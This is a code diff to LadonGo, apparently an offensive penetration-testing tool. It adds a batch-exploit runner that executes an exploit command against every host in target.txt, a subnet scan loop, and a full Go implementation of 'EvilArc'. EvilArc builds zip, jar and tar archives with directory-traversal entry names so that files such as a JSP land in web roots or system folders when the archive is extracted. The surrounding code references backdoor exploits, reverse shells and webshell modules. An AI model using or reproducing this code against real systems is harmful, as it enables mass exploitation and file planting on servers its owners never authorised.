LadonGo

Ladon.go

@@ -24,14 +24,15 @@ import (
 	"github.com/k8gege/LadonGo/oracle"
 	"github.com/k8gege/LadonGo/winrm"
 	"github.com/k8gege/LadonGo/rexec"
+	"github.com/k8gege/LadonGo/lexec"
 	"github.com/k8gege/LadonGo/dcom"
 	"github.com/k8gege/LadonGo/exp"
 	"github.com/k8gege/LadonGo/dic"
 	//"github.com/k8gege/LadonGo/tcp"
 	"github.com/k8gege/LadonGo/redis"
 	"github.com/k8gege/LadonGo/routeros"
 	"github.com/fatih/color"
-	"github.com/k8gege/socks5"
+	"github.com/armon/go-socks5"
 	"strings"
 	"log"
 	"time"
@@ -157,6 +158,8 @@ func Exploit() {
 	color.Magenta("\nExploit:")
 	fmt.Println("PhpStudyDoor\t(PhpStudy 2016 & 2018 BackDoor Exploit)")
 	fmt.Println("CVE-2018-14847\t(Export RouterOS Password 6.29 to 6.42)")
+	fmt.Println("BatchExp\t(Execute EXP scan target.txt)")
+	fmt.Println("EvilArc\t(Create archive a file with directory traversal)")
 }
 
 func Noping() {
@@ -170,7 +173,7 @@ func Noping() {
 }
 
 var isicmp bool
-var ver="4.0"
+var ver="4.x"
 func incIP(ip net.IP) {
 	for j := len(ip) - 1; j >= 0; j-- {
 		ip[j]++
@@ -196,7 +199,7 @@ func GetUser(){
 var debugLog *log.Logger
 var scanports string
 func main() {
-	color.Yellow("LadonGo "+ver+" by k8gege")
+	color.Yellow("LadonGo 4.2 by k8gege")
 	fmt.Println("Arch: "+runtime.GOARCH+" OS: "+runtime.GOOS)
 	fmt.Print("Name: ")
 	fmt.Print(os.Hostname())
@@ -293,6 +296,18 @@ func main() {
 			fmt.Println("Usage: Ladon Socks5 ip port")
 			os.Exit(0)
 		}
+		if SecPar == "BATCHEXP" {
+			fmt.Println("Usage: Ladon BatchExp cmdline SuccessTag")
+			fmt.Println("Usage: Ladon BatchExp \"exp.exe $url$ whoami\" ISOK")
+			fmt.Println("Usage: Ladon BatchExp \"./exp $url$ whoami\" ISVUL")
+			os.Exit(0)
+		}
+		if SecPar == "EVILARC" {
+			fmt.Println("Usage: Ladon EvilArc poc.zip 3 tmp/ lnx test.jsp")
+			fmt.Println("Supported extesions are zip, jar, tar, tar.bz2, tar.gz and tgz")
+			fmt.Println("Ex: WINDOWS\\\\System32\\\\ or var/www/")
+			os.Exit(0)
+		}
 		fmt.Println(SecPar,"Moudle Not Found")
 		os.Exit(0)
 	}
@@ -312,6 +327,19 @@ func main() {
 			rexec.LnxRevShell(os.Args[2],os.Args[3])
 			os.Exit(0)
 		}
+	if SecPar == "BATCHEXP" {
+			fmt.Println("Load "+SecPar)
+			for _, ip := range dic.TxtRead("target.txt") {
+				fmt.Println("Target: "+ip)
+				lcmd:=os.Args[2]
+				if strings.Contains(lcmd, "*target*"){				
+					lcmd=strings.Replace(lcmd,"*target*", ip, -1)
+				}
+				fmt.Println("PocCmd: "+lcmd)
+				lexec.Exec(lcmd)
+			}
+			os.Exit(0)
+		}
 	if SecPar == "SOCKS5" {
 			fmt.Println("Load "+SecPar)
 			conf := &socks5.Config{}
@@ -329,6 +357,16 @@ func main() {
 	fmt.Println(SecPar,"Moudle Not Found")
 	os.Exit(0)
 	}
+	if ParLen==7 {
+	SecPar := strings.ToUpper(os.Args[1])
+	if SecPar == "EVILARC" {
+		fmt.Println("Load "+SecPar)
+		depth,_:=strconv.Atoi(os.Args[3])
+		exp.EvilArc(os.Args[2],depth,os.Args[4],os.Args[5],os.Args[6])
+		os.Exit(0)
+		}
+	os.Exit(0)
+	}
 	if ParLen==5 {
 		SecPar := strings.ToUpper(os.Args[1])
 		if SecPar == "PHPSHELL" || SecPar == "PHPWEBSHELL" {
@@ -402,7 +440,9 @@ func main() {
 	}
 
 	ScanType := strings.ToUpper(EndPar)
-	if strings.Contains(Target, "/c")||strings.Contains(Target, "/C") {
+	if strings.Contains(Target, "/f")||strings.Contains(Target, "/F") {
+		ForScan(ScanType,Target)
+	} else if strings.Contains(Target, "/c")||strings.Contains(Target, "/C") {
 		CScan(ScanType,Target)
 	} else if strings.Contains(Target, "/b")||strings.Contains(Target, "/B") {
 		BScan(ScanType,Target)
@@ -487,6 +527,20 @@ func End(){
 fmt.Println(" Finished: "+time.Now().Format("2006-01-02 03:04:05"))
 os.Exit(0)
 }
+func ForScan(ScanType string,Target string){
+	ip := strings.Replace(Target, "/f", "", -1)
+	ip = strings.Replace(ip, "/F", "", -1)
+	ips := strings.Split(ip,".")
+	ip = ips[0]+"."+ips[1]+"."+ips[2]
+
+	for i:=1;i<256;i++ {
+		ip:=fmt.Sprintf("%s.%d",ip,i)
+			fmt.Println("c...: "+ip)
+			LadonScan(ScanType,ip);
+	}
+
+	CEnd()
+}
 func CScan(ScanType string,Target string){
 	ip := strings.Replace(Target, "/c", "", -1)
 	ip = strings.Replace(ip, "/C", "", -1)

exp/evilarc.go

@@ -0,0 +1,173 @@
+package exp
+//Ladon Scanner for golang 
+//Author: k8gege
+//K8Blog: http://k8gege.org/Ladon
+//Github: https://github.com/k8gege/LadonGo
+//Date:2022.7.10
+import (
+	"archive/tar"
+	"archive/zip"
+	"compress/gzip"
+	"fmt"
+	"io/ioutil"
+	"os"
+	"path"
+	"strings"
+	"time"
+)
+
+var (
+	outputFile     string
+	platform       string
+	prePath        string
+	customIterator string
+	depth          int
+)
+
+func dozip(filename string, out *os.File, content []byte) {
+	// Define ZipWriter writing to out file
+	zw := zip.NewWriter(out)
+	defer zw.Close()
+
+	// Create file in zip archive with traversal
+	zipContent, err := zw.Create(filename)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+
+	// Write content of infile to that traversal file
+	_, err = zipContent.Write(content)
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+
+	// Close zip writer
+	if err = zw.Close(); err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+}
+
+func dotar(filename string, out *os.File, content []byte) {
+	// Define TarWriter writing to out file
+	tw := tar.NewWriter(out)
+	defer tw.Close()
+
+	// Construct header
+	hdr := &tar.Header{
+		Name:    filename,
+		Mode:    int64(os.ModePerm),
+		Size:    int64(len(content)),
+		ModTime: time.Now(),
+	}
+	// Write header
+	if err := tw.WriteHeader(hdr); err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+	// Write content
+	if _, err := tw.Write(content); err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+	// Close TarWriter
+	if err := tw.Close(); err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+}
+
+func dogz(filename string, out *os.File, content []byte) {
+	// Define GzipWriter writing to out file
+	gw := gzip.NewWriter(out)
+	defer gw.Close()
+
+	// Set Header
+	gw.Name = filename
+	gw.Comment = "How dare you"
+	gw.ModTime = time.Date(1977, time.May, 25, 0, 0, 0, 0, time.UTC)
+
+	// Write content
+	if _, err := gw.Write(content); err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+
+	// Close GzipWriter
+	if err := gw.Close(); err != nil {
+		fmt.Println(err)
+		os.Exit(2)
+	}
+}
+
+func EvilArc(outputFile string,depth int,prePath,platform, inputFile string) {
+	var iterator string
+
+	// Current working directory
+	cwd, err := os.Getwd()
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	//fmt.Println(cwd)
+
+	// Read input file as last argument
+	//inputFile := os.Args[len(os.Args)-1]
+	inputContent, err := ioutil.ReadFile(path.Join(cwd, inputFile))
+	if err != nil {
+		fmt.Println(err)
+		os.Exit(1)
+	}
+
+	// Switch over platform to check which iterator to use
+	switch platform {
+	case "win":
+		iterator = "..\\"
+	case "lnx":
+		iterator = "../"
+	}
+
+	// If there is a custom iterator use this instead
+	if customIterator != "" {
+		iterator = customIterator
+	}
+
+	// construct the out path
+	// for usage as filename in archive
+	outPath := fmt.Sprintf("%s%s%s", strings.Repeat(iterator, depth), prePath, inputFile)
+	fmt.Printf("The filename in the archive will be: %s\n", outPath)
+
+	// Create out file
+	outFile, err := os.Create(outputFile)
+	if err != nil {
+		fmt.Println(err)
+	}
+	defer outFile.Close()
+
+	// Switch over extension of output file
+	ext := strings.Split(outputFile, ".")
+	finalExt := ext[len(ext)-1]
+
+	switch finalExt {
+	case "zip":
+		dozip(outPath, outFile, inputContent)
+	case "jar":
+		dozip(outPath, outFile, inputContent)
+	case "tar":
+		dotar(outPath, outFile, inputContent)
+	case "gz":
+		dotar(outPath, outFile, inputContent)
+	case "tgz":
+		dotar(outPath, outFile, inputContent)
+	case "bz2":
+		dotar(outPath, outFile, inputContent)
+	default:
+		fmt.Println("Could not identify target format. Choose from: .zip, .jar, .tar, .gz, .tgz, .bz2")
+		os.Exit(1)
+	}
+
+	fmt.Printf("%s was written.\n", outputFile)
+}